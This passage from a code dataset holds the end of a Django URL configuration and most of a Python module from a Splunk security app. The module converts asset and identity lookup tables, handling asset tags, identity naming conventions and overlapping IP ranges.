wallet.views.UpdateNotificationAPIView.as_view()),\n\n # urls for authentications\n path('authentication/', include('authentication.urls')),\n path('wallet/', include('wallet.urls')),\n\n # urls for swagger documentation\n path('', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n path('swagger.json', schema_view.without_ui(cache_timeout=0), name='schema-json'),\n path('redoc/', schema_view.with_ui('redoc', cache_timeout=0), name='schema-redoc'),\n\n]\n\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL,\n document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","repo_name":"iradtaufique/banka","sub_path":"banka/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19722847847","text":"import abc\nimport collections\nimport hashlib\nimport heapq\nimport logging\nimport re\nimport sys\n\nimport splunk\n\nfrom identity import Identity\nfrom identity import IdentityLookup\n\nfrom splunk.appserver.mrsparkle.lib.util import make_splunkhome_path\nsys.path.append(make_splunkhome_path([\"etc\", \"apps\", \"SA-Utils\", \"lib\"]))\nfrom ..error import LookupConversionErrors\nfrom SolnCommon import ipMath\nfrom SolnCommon.modular_input import logger\n\n# Constants for field deferral status.\n# DEFERRED indicates that a line's processing must be deferred due to a particular\n# field value; NOT_DEFERRED indicates that no deferral is necessary.\nDEFERRED = True\nNOT_DEFERRED = False\n\n# Constants for default argument values.\nDEFAULT_DEPENDENCIES = {}\nDEFAULT_DEFERRED_DEPENDENCIES = {}\nDEFAULT_REQUIREMENTS = {}\n\n\nclass AbstractFieldMapping(object):\n '''Abstract field mapping class.'''\n __metaclass__ = abc.ABCMeta\n \n # Read-only Properties\n @abc.abstractproperty\n def name(self): \n pass\n\n @abc.abstractproperty\n def depends(self): \n pass\n\n @abc.abstractproperty\n def requires(self):\n pass\n\n @abc.abstractproperty\n def deferred_requires(self):\n pass\n\n @abc.abstractproperty\n def delim(self):\n pass\n \n @abc.abstractproperty\n def is_key_field(self):\n pass\n\n @abc.abstractproperty\n def is_generated(self):\n pass\n\n @abc.abstractproperty\n def is_tracked(self):\n pass\n\n # Methods\n @abc.abstractmethod\n def validate(self):\n pass\n \n @abc.abstractmethod\n def convert(self):\n pass\n \n @abc.abstractmethod\n def convert_deferred(self):\n pass\n\n @abc.abstractmethod\n def postprocess(self):\n pass\n\n \nclass FieldMapping(AbstractFieldMapping):\n '''Generic class for handling field mappings.\n Named FieldMapping to avoid conflicts with splunk.models.Field.\n \n See the code for this class for more details on the meaning of each parameter. \n '''\n\n def __init__(self,\n name,\n depends=DEFAULT_DEPENDENCIES,\n requires=DEFAULT_REQUIREMENTS,\n deferred_requires=DEFAULT_DEFERRED_DEPENDENCIES,\n is_generated=False,\n is_key_field=False,\n is_persistent=False,\n is_tracked=False,\n delim=None,\n replace_null=None,\n custom_data=None):\n '''Initialize a FieldMapping class.\n \n @param name: The output field name.\n @param dependencies: A list of this conversion's dependencies.\n @param requirements: A list of this conversions requirements.\n @param deferred_requirements: A list of this conversion's deferred requirements.\n @param is_key_field: True if this value is a key field in the generated lookup table.\n @param is_generated: True if this field is generated (i.e., not present in the input file).\n @param is_tracked: True if this field should keep track of its values.\n @param delim: A delimiter for handling multi-valued input fields.\n @param replace_null: A replacement string for handling missing input values.\n '''\n\n ### Positional parameters ###\n self._name = name\n self._depends = depends\n self._requires = requires\n self._deferred_requires = deferred_requires\n \n ### Keyword parameters ###\n self._delim = delim\n self._is_generated = is_generated\n self._is_key_field = is_key_field\n self._is_persistent = is_persistent\n self._is_tracked = is_tracked\n self._delim = delim\n self._replace_null = replace_null\n self._custom_data = custom_data\n\n # Internal state. \n self._all_values = set() # Tracks all values of the field.\n\n ### Properties ###\n @property\n def name(self):\n return self._name\n \n @property\n def depends(self):\n return self._depends\n \n @property\n def requires(self):\n return self._requires\n \n @property\n def deferred_requires(self):\n return self._deferred_requires\n\n @property\n def delim(self):\n return self._delim\n \n @property\n def is_generated(self):\n return self._is_generated\n \n @property\n def is_key_field(self):\n return self._is_key_field\n\n @property\n def is_persistent(self):\n return self._is_persistent\n\n @property\n def is_tracked(self):\n return self._is_tracked\n \n @property\n def replace_null(self):\n return self._replace_null\n\n @property\n def custom_data(self):\n return self._custom_data\n\n ### Validation actions\n def validate(self, value, *args, **kwargs):\n '''Validate that the input value of the field is correct.\n If an input field does not validate, the entire input line is \n rejected. Default validation is to pass the field along unchanged,\n since all input fields from a csv.DictReader will be instances\n of basestring.\n \n Generated fields always validate since they do not actually exist.\n Generated fields should set self._is_generated=True in their\n Field specification since the value passed in for a field that does\n not exist in the original CSV file will be None.\n ''' \n if isinstance(value, basestring) or (value is None and self.is_generated) or isinstance(self.replace_null, basestring):\n return True\n return False\n\n ### Preprocessing actions\n def preprocess(self, value, *args, **kwargs):\n # Note: Only the initial values of fields can be tracked, not their \n # converted values.\n if self.is_tracked and value:\n if self.delim and isinstance(value, basestring):\n self._all_values.update(value.split(self.delim))\n else:\n self._all_values.add(value)\n\n ### Conversion actions\n def convert(self, value, dependencies, requirements, record_num):\n '''The default action is to return the string unchanged.\n Return value from any convert() function is expected to be\n a tuple consisting of:\n\n (val, deferred_status)\n\n where:\n \n val = output value (possibly a list)\n deferred_status = Boolean indicating whether this field's\n value forces the line to undergo deferred\n processing.\n\n Deferred fields will cause the source line to be placed into\n a separate queue for processing. ONLY fields that actually \n require deferred processing will be processed during the \n deferred processing pass; the remainder of the line is not processed\n again.\n \n Generated fields MUST implement a convert() method of their own,\n to avoid raising AttributeError here. Only pure strings can be\n converted using the base FieldMapping class.\n '''\n if value is None and self.replace_null is not None:\n return (self.replace_null, NOT_DEFERRED)\n else:\n return (value.strip(), NOT_DEFERRED)\n\n def convert_deferred(self, *args, **kwargs):\n '''Conduct deferred field processing taking into account any saved \n state accumulated by the class. Default behavior is to do nothing and return\n the value\n '''\n pass\n\n def postprocess(self, *args, **kwargs):\n '''Conduct postprocessing for any saved state accumulated by the \n class. Default behavior is to do nothing and return nothing. This function\n does not return a value.\n '''\n if self.is_tracked:\n return self._all_values\n return None\n\n\nclass AssetIdFieldMapping(FieldMapping):\n \n def convert(self, value, dependencies, requirements, record_num):\n '''Concatenate ip/mac/nt_host/dns to form an asset_id.\n Zero-length string will evaluate to false.\n \n The asset_id field refers to the value in the ORIGINAL lookup\n table, not the converted one. This allows us to correlate\n the asset with a specific line in the original user file,\n even though a single range might expand to many lines\n in the expanded lookup file.\n \n Generates the same asset_id as assetLookup.py. Order is\n important to maintain continuity with the previous assetLookup.py\n implementation.\n \n Any incoming value is ignored.\n '''\n \n asset_id = ''.join([requirements.get(i, '') for i in ['ip', 'mac', 'nt_host', 'dns']])\n\n # Zero-length string will evaluate to false\n return (hashlib.sha1(asset_id).hexdigest() if asset_id else '', NOT_DEFERRED)\n\n\nclass AssetTagFieldMapping(FieldMapping):\n\n def convert(self, value, dependencies, requirements, record_num):\n '''Return the asset tag for the host.'''\n \n # Incoming value is actually ignored for asset_tag as it is a generated field.\n \n # Retrieve dependencies\n bunit = dependencies.get('bunit', [])\n categories = dependencies.get('category', [])\n\n asset_tag = set()\n \n for bField in ['should_timesync', 'should_update', 'requires_av']:\n try:\n if splunk.util.normalizeBoolean(dependencies.get(bField, False)):\n asset_tag.add(bField)\n except:\n # Catch exception in case the assets.csv entry cannot be\n # interpreted as a Boolean.\n pass\n \n # Make sure to add multiple categories if they exist.\n if isinstance(categories, list):\n for category in categories:\n asset_tag.add(category)\n else:\n asset_tag.add(categories)\n \n try:\n if splunk.util.normalizeBoolean(dependencies.get('is_expected', False)):\n asset_tag.add('expected')\n except ValueError:\n # Catch exception in case the assets.csv entry cannot be\n # interpreted as a Boolean.\n pass\n \n # Business unit is single-valued \n asset_tag.add(bunit)\n\n # Discard empty entries.\n asset_tag.discard('')\n\n # Return multi-valued output IFF there is only more than one item.\n if len(asset_tag) == 0:\n return ('', NOT_DEFERRED)\n elif len(asset_tag) == 1:\n return (asset_tag.pop(), NOT_DEFERRED)\n else:\n return (list(asset_tag), NOT_DEFERRED)\n\n\nclass BooleanFieldMapping(FieldMapping):\n \n # Separate validation is not required here since this function is \n # guaranteed to return a boolean value.\n \n def convert(self, value, dependencies, requirements, record_num):\n '''Return a Boolean \"true\" or \"false\" if the input field can\n be appropriately converted.\n '''\n \n try:\n if splunk.util.normalizeBoolean(value, enableStrictMode=True, includeIntegers=True):\n return ('true', NOT_DEFERRED)\n except ValueError:\n pass\n return ('false', NOT_DEFERRED)\n\n\nclass CategoryFieldMapping(FieldMapping):\n\n def convert(self, value, dependencies, requirements, record_num):\n '''Return a list of categories, given an input pipe-separated string\n of categories, conducting the following transformations:\n \n 1. If category == cardholder, add category=pci\n \n Also maintain a list of categories for output to ancillary lookup file.\n The ancillary lookup file will be output during the postprocess() action.\n \n '''\n \n categories = set(value.split(self.delim))\n\n if 'cardholder' in categories:\n categories.add('pci')\n\n # Discard empty entries.\n categories.discard('')\n\n # Update the set of all categories.\n self._all_values.update(categories)\n\n # Return multi-valued IFF there is only more than one item.\n if len(categories) == 0:\n return ('', NOT_DEFERRED)\n if len(categories) == 1:\n return (categories.pop(), NOT_DEFERRED)\n else:\n return (list(categories), NOT_DEFERRED)\n\n\nclass IdentityFieldMapping(FieldMapping):\n\n def __init__(self, *args, **kwargs):\n '''Set up the order in which identity lookups will be processed.\n \n The default order, in case there is an error in retrieving the\n identityLookup.conf configuration, mimics the previous behavior\n of identityLookup.py:\n \n identity (exact match), email, email_short, convention\n '''\n\n # Custom data specification.\n #\n # The configuration object stored in self._custom_data is a \n # util.SplunkIdentityLookupConf object and will have these fields:\n #\n # case_sensitive (Boolean)\n # convention (Boolean)\n # conventions (List)\n # email (Boolean)\n # email_short (Boolean)\n # exact (Boolean)\n # match_order (List)\n #\n # The case_sensitive value is unused here - case sensitivity must\n # be specified in the lookup definition.\n\n # Regular expression for extracting e-mail addresses\n self._email_rx = re.compile(Identity.emailREpattern)\n \n # Build the regex for string replacements from the defined conventions,\n # based on the set of valid field names in the input CSV that can\n # be used for replacements (this is equivalent to the \"dependencies\" at\n # this point. To use ALL fields including custom fields, we would need to\n # extrapolate this to accept an ancillary value in __init__, and make the\n # identity field depend on the final values of ALL other fields including\n # custom fields).\n self._conventionValRE = self.buildReplacementConventions(kwargs.get('depends', []))\n \n super(IdentityFieldMapping, self).__init__(*args, **kwargs)\n\n def buildReplacementConventions(self, fields):\n '''Build a regular expression that will match all field names in the\n current identities.csv file.'''\n \n rx = []\n for field in fields:\n rx.append('{0}'.format(field))\n rx = '(' + '|'.join(rx) + ')\\((\\d+)?\\)'\n\n return re.compile(rx)\n \n def convert(self, value, dependencies, requirements, record_num):\n '''Return a set of identities for the given input.'''\n \n # Create the output dictionary\n identities = {}\n\n # Retrieve the current field value and split into identities.\n # These are used for exact matching.\n if self.custom_data.exact:\n identities[IdentityLookup.PARAM_EXACT] = [i.strip() for i in value.split(self._delim) if i != '']\n \n if self.custom_data.email:\n # Retrieve dependencies\n email = dependencies.get('email', None)\n # Get the email address and short e-mail address\n if email is not None and email != '':\n identities[IdentityLookup.PARAM_EMAIL] = [email]\n if self.custom_data.email_short:\n rx = self._email_rx.match(email)\n if rx:\n identities[IdentityLookup.PARAM_EMAIL_SHORT] = [rx.group(1)]\n \n # Format the identities based on any conventions derived from\n # identityLookup.conf.\n #\n # A convention is a string composed of ().()\n # indicating that the should be replaced with \n # characters from the actual field value.\n #\n # Per SOLNESS-3406, non-field name portions of the string\n # are also permitted in the convention. For instance:\n #\n # first(1)last().admin\n #\n # would represent a naming scheme for administrative Kerberos principals.\n if self.custom_data.convention:\n for conventionStr in self.custom_data.conventions:\n\n # Get the convention string, which should be a text string\n # containing replacement parameters in the form\n # (). These portions of the string will be\n # replaced directly with the corresponding field and character\n # count. If the field does not exist in the input, the empty\n # string will be used as a replacement.\n #\n # We improve on the previous handling of convention matching\n # by eliminating two cases from the output:\n # 1. Cases where zero successful field replacements could be\n # performed. For instance, if no successful field replacements\n # could be made, the convention string \"first(1).last\" could\n # result in an identity value of \".\", which is wrong.\n #\n # 2. Cases where the replacement string included only empty\n # replacements.\n matchCount = 0\n nonEmptyMatchCount = 0\n \n conventionValMatch = self._conventionValRE.finditer(conventionStr)\n\n # identityStr is the final value that we will return.\n identityStr = conventionStr\n for valMatch in conventionValMatch:\n fieldValue = dependencies.get(valMatch.group(1), False)\n if fieldValue and fieldValue != '':\n matchCount += 1\n if valMatch.group(2) is None or len(valMatch.group(2)) == 0:\n # Convention specified no replacement character length,\n # indicating to replace with the full string.\n strLength = len(fieldValue) \n else:\n # Replacement character length is not empty, \n # indicating to replace with a substring.\n strLength = int(valMatch.group(2))\n \n # Get the replacement value.\n replacementValue = fieldValue[:strLength]\n \n # If the replacement value is not empty, increment\n # the count of non-empty matches.\n if len(replacementValue) > 0:\n nonEmptyMatchCount += 1\n identityStr = identityStr.replace(valMatch.group(0), replacementValue)\n\n else:\n # A field value was not supplied in the input data.\n # Replace it with a blank in the output string.\n identityStr = identityStr.replace(valMatch.group(0), '')\n \n # Output the identity IFF more than one non-empty match was made.\n if matchCount > 0 and nonEmptyMatchCount > 0:\n curr = identities.setdefault(IdentityLookup.PARAM_CONVENTION, []) \n curr.append(identityStr)\n else:\n # Do not add the identity.\n pass\n \n # Output the identity values in order based on the configuration.\n # This order will be used to output the CSV files, so that the first\n # match is successful.\n # To deduplicate entries, we use an OrderedDict to maintain the match order,\n # but also deduplicate identity keys while respecting case.\n output = collections.OrderedDict()\n for item in self.custom_data.match_order:\n for representation in identities.get(item, []):\n if self.custom_data.case_sensitive:\n output[representation] = None\n else:\n output[representation.lower()] = None\n \n return (output.keys(), NOT_DEFERRED)\n\n\nclass IdentityIdFieldMapping(FieldMapping):\n \n def convert(self, value, dependencies, requirements, record_num):\n '''Concatenate fields to form an identity ID.\n Zero-length string will evaluate to false.\n \n The ID field refers to the value in the ORIGINAL lookup\n table, not the converted one. This allows us to correlate\n the generated line with a specific line in the original input file.\n \n Any incoming value is ignored.\n '''\n \n ident_id = ''.join([requirements.get(i, '') for i in ['identity', 'first', 'last', 'email']])\n\n # Zero-length string will evaluate to false\n return (hashlib.sha1(ident_id).hexdigest() if ident_id else '', NOT_DEFERRED)\n\n\nclass IdentityTagFieldMapping(FieldMapping):\n\n def convert(self, value, dependencies, requirements, record_num):\n '''Return the identity_tag for the host.'''\n \n # Incoming value is actually ignored for identity_tag as it is a generated field.\n \n # Retrieve dependencies\n bunit = dependencies.get('bunit', [])\n categories = dependencies.get('category', [])\n watchlist = dependencies.get('watchlist', False)\n\n tag = set()\n \n # Make sure to add multiple categories if they exist.\n if isinstance(categories, list):\n for category in categories:\n tag.add(category)\n else:\n tag.add(categories)\n \n try:\n if splunk.util.normalizeBoolean(watchlist, False):\n tag.add('watchlist')\n except ValueError:\n # Catch exception in case the CSV entry cannot be\n # interpreted as a Boolean.\n pass\n \n # Business unit is single-valued \n tag.add(bunit)\n\n # Discard empty entries.\n tag.discard('')\n\n # Return multi-valued output IFF there is only more than one item.\n if len(tag) == 0:\n return ('', NOT_DEFERRED)\n elif len(tag) == 1:\n return (tag.pop(), NOT_DEFERRED)\n else:\n return (list(tag), NOT_DEFERRED)\n \n \nclass IpAddressFieldMapping(FieldMapping):\n\n def __init__(self, *args, **kwargs):\n FieldMapping.__init__(self, *args, **kwargs)\n\n # Define heap of IP ranges as tuples of long integers:\n #\n # (range_low, range_high).\n #\n # The heap is used to split IP ranges when smaller ranges (including\n # single addresses) are specified elsewhere in the lookup table.\n # In the case of a duplication or overlap, the entry with the \"lowest\" \n # priority and asset_id will win. Priority is used so that assets \n # specified as single IP addresses in the original table will always \n # win out over ranges or subnets, and ranges or subnets defined\n # in the original asset table will win out over ranges derived by \n # calculation. \n self._ranges = []\n\n def _split_ip_ranges(self):\n '''Given a heap of tuples:\n (range_low, range_high, key)\n split the numeric ranges so that there are no overlapping\n ranges. For instance, given:\n \n (100, 101, , a)\n (100, 105, , b)\n (106, 110, , c)\n return:\n (100, 101, , [a,b])\n (102, 105, , b)\n (106, 110, , c)\n\n Ambiguous overlaps result in the second range being discarded.\n This can be used to sort lists of subnets in (range_low, range_high)\n format when the bounding IPs are expressed as long integers.\n This function takes advantage of Python's heapq, which\n can accept tuples and sort them properly based on all values\n in the tuple.\n \n There are some extraneous heappush() and heappop() calls here; it \n would be possible to construct an equivalent function that\n always retained the lowest range in rangeA.\n '''\n \n overlap_warning = \"Range overlap: rangeA_rows={0} rangeB_rows={1} rangeA={2}-{3} rangeB={4}-{5}\"\n duplicate_warning = \"Range duplicated: rangeA_rows={0} rangeB_rows={1} rangeA={2}-{3} rangeB={4}-{5}\"\n \n output = []\n if len(self._ranges) > 0:\n while len(self._ranges) > 1:\n rangeA_low, rangeA_high, rangeA_priority, rangeA_rows = heapq.heappop(self._ranges)\n rangeB_low, rangeB_high, rangeB_priority, rangeB_rows = heapq.heappop(self._ranges)\n if not isinstance(rangeA_rows, list):\n rangeA_rows = [rangeA_rows]\n if not isinstance(rangeB_rows, list):\n rangeB_rows = [rangeB_rows]\n if rangeA_low < rangeB_low:\n if rangeA_high < rangeB_high:\n if rangeA_high < rangeB_low:\n # Ranges do not overlap.\n # 1. Push rangeA to output.\n # 2. Push rangeB back onto heap, as it may overlap\n # with the next range.\n output.append((rangeA_low, rangeA_high, rangeA_priority, rangeA_rows))\n heapq.heappush(self._ranges, (rangeB_low, rangeB_high, rangeB_priority, rangeB_rows))\n else:\n # Range overlap.\n # 1. Split BOTH ranges into range A', range C, range B'.\n # 2. Add rows from both rangeA and rangeB to rangeC \n # 3. Add all three ranges back to heap, increasing priority.\n rangeC_low, rangeC_high = rangeB_low, rangeA_high\n rangeA_high = rangeB_low - 1\n rangeB_low = rangeA_high + 1\n rangeC_rows = rangeA_rows + rangeB_rows\n # TODO: How best to calculate rangeC priority?\n rangeC_priority = rangeA_priority\n logger.debug(overlap_warning.format(rangeA_rows, rangeB_rows, ipMath.LongToIP(rangeA_low), ipMath.LongToIP(rangeA_high), ipMath.LongToIP(rangeB_low), ipMath.LongToIP(rangeB_high)))\n heapq.heappush(self._ranges, (rangeA_low, rangeA_high, rangeA_priority + 1, rangeA_rows))\n heapq.heappush(self._ranges, (rangeC_low, rangeC_high, rangeC_priority + 1, rangeC_rows))\n heapq.heappush(self._ranges, (rangeB_low, rangeB_high, rangeB_priority + 1, rangeB_rows))\n elif rangeA_high == rangeB_high:\n # rangeA subsumes rangeB \"on left\".\n # 1. Split rangeA into rangeA', rangeB and increase priority of A'.\n # 2. Push rangeA to output (this is guaranteed to be OK\n # since rangeA_low < rangeB_low)\n # 3. Add rangeA rows to rangeB\n # 4. Return rangeB to heap.\n # 5. Continue\n rangeA_high = rangeB_low - 1\n output.append((rangeA_low, rangeA_high, rangeA_priority + 1, rangeA_rows))\n rangeB_rows.extend(rangeA_rows)\n heapq.heappush(self._ranges, (rangeB_low, rangeB_high, rangeB_priority, rangeB_rows))\n elif rangeA_high > rangeB_high:\n # rangeA subsumes rangeB on both sides.\n # 1. Split rangeA into rangeA', rangeB, rangeA'' and increase priority of A' and A''.\n # 2. Push rangeA' to output (this is guaranteed to be OK\n # since rangeA_low < rangeB_low)\n # 3. Add rangeA rows to rangeB\n # 4. Return rangeB, rangeA'' to heap.\n # 5. Continue.\n rangeAprime_high = rangeA_high\n rangeAprime_low = rangeB_high + 1\n rangeA_high = rangeB_low - 1\n output.append((rangeA_low, rangeA_high, rangeA_priority + 1, rangeA_rows))\n rangeB_rows.extend(rangeA_rows)\n heapq.heappush(self._ranges, (rangeAprime_low, rangeAprime_high, rangeA_priority + 1, rangeA_rows))\n heapq.heappush(self._ranges, (rangeB_low, rangeB_high, rangeB_priority, rangeB_rows))\n else:\n # This should never happen due to heap ordering.\n raise ValueError('Range ordering was invalid... aborting lookup generation.')\n elif rangeA_low == rangeB_low:\n if rangeA_high == rangeB_high:\n # Exact duplicate.\n # 1. Add rangeB rows to rangeA\n # 2. Discard rangeB.\n # 3. Continue.\n logger.debug(overlap_warning.format(rangeA_rows, rangeB_rows, ipMath.LongToIP(rangeA_low), ipMath.LongToIP(rangeA_high), ipMath.LongToIP(rangeB_low), ipMath.LongToIP(rangeB_high)))\n rangeA_rows.extend(rangeB_rows)\n heapq.heappush(self._ranges, (rangeA_low, rangeA_high, rangeA_priority, rangeA_rows))\n elif rangeA_high < rangeB_high:\n # rangeB subsumes rangeA \"on right\".\n # 1. Split rangeB into rangeA, rangeB' and increase priority of B'.\n # 2. Add rangeB rows to rangeA\n # 3. Push both ranges back to heap.\n # 4. Continue.\n rangeB_low = rangeA_high + 1\n rangeA_rows.extend(rangeB_rows)\n heapq.heappush(self._ranges, (rangeA_low, rangeA_high, rangeA_priority, rangeA_rows))\n heapq.heappush(self._ranges, (rangeB_low, rangeB_high, rangeB_priority + 1, rangeB_rows))\n else:\n # This is the rangeA_high > rangeB_high case: this should never happen.\n # due to heap ordering.\n raise ValueError('Range ordering invalid... aborting lookup generation.')\n \n # Append final range if one is present.\n if len(self._ranges) > 0:\n output.append(heapq.heappop(self._ranges))\n return output\n \n def convert(self, value, dependencies, requirements, record_num):\n '''Convert an input IP address value to a CIDR value compatible\n with a Splunk lookup table.\n \n Three possibilities:\n 1. The value is a range. Processing will be deferred so that the\n range can be split into CIDR subnets and checked for overlaps\n with other entries.\n 2. The value is an IP. Output it directly, but add the address to\n the list of all IP ranges to avoid overlap. Thus, a specific single\n IP entry in the input CSV takes precedence over a range.\n 3. The value is a CIDR address. If it is an IP in /32 form, \n treat as in step 2. Otherwise, treat as in step 1.\n 4. The entry is blank. Ignore it.\n 5. The entry is invalid in some other way. Return the original value.\n This should not happen due to input validation but is accounted for\n in this code for safety.\n '''\n\n # Remove leading and trailing whitespace. \n value = value.strip()\n \n # Use lineno if a different sorting order is not implied by dependencies.\n # TODO: handle asset_id renaming to row_id in dependencies array.\n # TODO: specify sorting order.\n row_id = record_num\n if dependencies:\n row_id = dependencies.get('row_id', record_num)\n\n if '-' in value: \n # The value is likely an IP range. \n # 1. Split into tuple and validate.\n # a. If valid, push range onto heap.\n # b. If NOT valid, short-circuit and return original value\n # (this should actually never happen due to validate() method).\n # 2. Return the range as (range_low, range_high) tuple and defer processing.\n range_low, range_high = value.split('-', 1)\n if ipMath.is_valid_ip(range_low) and ipMath.is_valid_ip(range_high):\n range_low = ipMath.IPToLong(range_low)\n range_high = ipMath.IPToLong(range_high)\n heapq.heappush(self._ranges, (range_low, range_high, 1, row_id))\n return ((range_low, range_high), DEFERRED)\n else:\n sys.stdout.write(LookupConversionErrors.ERR_INVALID_IP_RANGE + ': %s\\n' % value)\n return (value, NOT_DEFERRED)\n\n elif ipMath.is_valid_ip(value):\n # This is a VALID IP ADDRESS.\n # 1. Add to the heap of IPs in /32 syntax.\n # 2. Return the value unchanged, do not conduct deferred processing\n # (duplicate elimination is handled in converters.py::_format_output).\n ipLong = ipMath.IPToLong(value)\n heapq.heappush(self._ranges, (ipLong, ipLong, 0, row_id))\n return (value, NOT_DEFERRED)\n\n elif ipMath.is_valid_cidr(value):\n # This is a VALID CIDR specifier.\n # 1. If it ends in /32, convert and treat as normal IP.\n # 2. If it is a subnet, convert to range and add to range heap\n # in (range_low, range_high) format, and defer processing.\n range_low, range_high = ipMath.CIDRToLongTuple(value)\n if range_low == range_high:\n heapq.heappush(self._ranges, (range_low, range_low, 0, row_id))\n return (value.replace('/32', ''), NOT_DEFERRED)\n else:\n heapq.heappush(self._ranges, (range_low, range_high, 1, row_id))\n return ((range_low, range_high), DEFERRED)\n\n elif value == '':\n # This is a BLANK value. Ignore it.\n return (value, NOT_DEFERRED)\n else:\n # This is an INVALID value. Return it, but log the event.\n logger.error(LookupConversionErrors.formatErr(LookupConversionErrors.ERR_INVALID_IP_OR_CIDR, value))\n return (value, NOT_DEFERRED)\n\n def postprocess(self):\n '''Conduct postprocessing.\n 1. Break the collected IP ranges into non-overlapping ranges.\n 2. Create directory keying the ranges by asset_id so we can easily\n process the deferred lines in convert_deferred().\n '''\n self._ranges_by_row_ids = {}\n\n ## Debugging code only.\n if logger.getEffectiveLevel() == logging.DEBUG:\n logger.debug(\"=====RANGES BEFORE SPLIT=====\")\n for low, high, priority, row_ids in self._ranges:\n logger.debug(str((ipMath.LongToIP(low), ipMath.LongToIP(high), priority, row_ids)))\n ## End debugging code.\n\n self._ranges = self._split_ip_ranges()\n\n # Generate [row_id] -> [ranges] dictionary\n for low, high, priority, row_ids in self._ranges:\n #print 'LOW: {} HIGH: {} PRIORITY: {} ROW_IDS: {}'.format(low, high, priority, row_ids)\n if isinstance(row_ids, list):\n for row_id in row_ids:\n tmp = self._ranges_by_row_ids.setdefault(row_id, [])\n tmp.append((low, high))\n else:\n # Only received one asset as input.\n tmp = self._ranges_by_row_ids.setdefault(row_ids, [])\n tmp.append((low, high))\n\n ## Debugging code only.\n if logger.getEffectiveLevel() == logging.DEBUG:\n logger.debug(\"=====RANGES AFTER SPLIT=====\")\n for low, high, priority, row_ids in self._ranges:\n logger.debug(str((ipMath.LongToIP(low), ipMath.LongToIP(high), priority, row_ids)))\n logger.debug(\"=====RANGES AFTER SPLIT BY ASSET ID=====\")\n for key, value in self._ranges_by_row_ids.iteritems():\n logger.debug('%s' % key)\n for theRange in value:\n low, high = theRange\n logger.debug(' %s - %s' % (ipMath.LongToIP(low), ipMath.LongToIP(high)))\n ## End debugging code.\n\n # Clear self._ranges for a subsequent run. This is required if the script\n # runs persistently, otherwise duplicates will accumulate.\n self._ranges = []\n return\n\n def convert_deferred(self, value, deferred_requirements, record_num):\n '''Perform deferred conversion of any IP ranges to \n CIDR subnets prior to writing the output lookup table.\n \n Note that the input value is ignored here, since the \n converted IP address range has already been determined\n in postprocessing and can be determined solely from the \n asset_id value.\n '''\n \n # If a field mapping defines a different container for the \"row_id\" we \n # need to retrieve if can be used via the following idiom.\n #\n # if deferred_requirements:\n # record_num = deferred_requirements.get('row_id', record_num)\n \n # Retrieve the ranges that are associated with the original row that\n # created this record.\n ranges = self._ranges_by_row_ids.get(record_num, None)\n\n cidr_list = []\n if ranges:\n [cidr_list.extend(ipMath.expand_ip_range_to_cidr(i)) for i in ranges]\n else:\n logger.warning(LookupConversionErrors.formatErr(LookupConversionErrors.ERR_RANGES_NOT_FOUND, record_num))\n return ipMath.trim_cidr_list(cidr_list, 32)\n \n def validate(self, value):\n # Simple validation that the value is a string of length less than the\n # maximum of an IPv6 address. IPv4 addresses in single IP/CIDR form\n # will be validated later; non-IPv4 values are passed naively to the\n # output lookup table.\n return isinstance(value, basestring) and len(value) < 40\n\nclass SimpleIpAddressFieldMapping(FieldMapping):\n\n def __init__(self, *args, **kwargs):\n FieldMapping.__init__(self, *args, **kwargs)\n\n def convert(self, value, dependencies, requirements, record_num):\n '''Convert an input IP address value to a CIDR value compatible\n with a Splunk lookup table.\n \n Several possibilities, not necessarily in order of frequency:\n 1. The value is a range. Convert it to a single IP (common case) or \n CIDR range set.\n 2. The value is an IP. Output it directly.\n 3. The value is a CIDR address. If it is an IP in /32 form, \n treat as in step 2. Otherwise, return it.\n 4. The entry is blank. Ignore it.\n 5. The entry is invalid in some other way. Return the original value.\n This should not happen due to input validation but is accounted for\n in this code for safety.\n '''\n\n # Remove leading and trailing whitespace. \n value = value.strip()\n\n if ipMath.is_valid_ip(value):\n # This is a VALID IP ADDRESS.\n return (value, NOT_DEFERRED)\n elif '-' in value:\n # The value is likely an IP range. \n # 1. If it represents a single IP, return a single IP.\n # 2. Otherwise, return a minimal CIDR format.\n # 3. If the CIDR conversion fails, return the original value but \n # log the error.\n addr_low, addr_high = value.split('-', 1)\n if addr_low == addr_high:\n return (addr_low, NOT_DEFERRED)\n else:\n try:\n return (ipMath.expand_ip_range_to_cidr(value, clean_single_ips=True, expand_subnets_smaller_than=24), NOT_DEFERRED)\n except ValueError:\n # Invalid range. Log the event.\n logger.error(LookupConversionErrors.formatErr(LookupConversionErrors.ERR_INVALID_IP_RANGE, value))\n return (value, NOT_DEFERRED)\n elif ipMath.is_valid_cidr(value):\n # This is a VALID CIDR specifier.\n # 1. If it ends in /32, convert and treat as normal IP.\n # 2. If it is a subnet, return it.\n if value.ends_with('/32'):\n return (value.replace('/32', ''), NOT_DEFERRED)\n return (value, NOT_DEFERRED)\n else:\n # This is an INVALID value. Return it, but log the event.\n logger.error(LookupConversionErrors.formatErr(LookupConversionErrors.ERR_INVALID_IP_OR_CIDR, value))\n return (value, NOT_DEFERRED)\n\n def validate(self, value):\n if value == \"\":\n return True\n else:\n return ipMath.is_valid_ip(value) or ipMath.is_valid_cidr(value) or ipMath.is_valid_ip_range_str(value)\n\n\nclass KeyFieldMapping(FieldMapping):\n \n def convert(self, value, dependencies, requirements, record_num):\n '''Always return an empty string during conversion. The key field is\n only written to during output lookup table generation.\n '''\n return (\"\", NOT_DEFERRED)\n \n def validate(self, *args, **kwargs):\n '''Always validate any input data for this field; the input value\n will be discarded.'''\n return True\n\n\nclass PciDomainFieldMapping(FieldMapping):\n \n def __init__(self, *args, **kwargs):\n '''Maintain a list of all PCI domains for output to ancillary\n lookup table.\n '''\n FieldMapping.__init__(self, *args, **kwargs)\n \n def convert(self, value, dependencies, requirements, record_num):\n '''Return a list of PCI domains, given an input value conssting of a\n pipe-separated string of PCI domains, conducting the following\n transformations in the order shown:\n \n 1. If category == \"pci\", add \"trust\" to pci_domain\n 2. If pci_domain in [\"wireless\", \"dmz\"], add \"trust\" to pci_domain\n 3. If category == \"cardholder\", add \"trust\" and \"cardholder\" to pci_domain\n 4. If pci_domain is empty, return \"untrust\".\n '''\n \n # Retrieve dependencies\n categories = 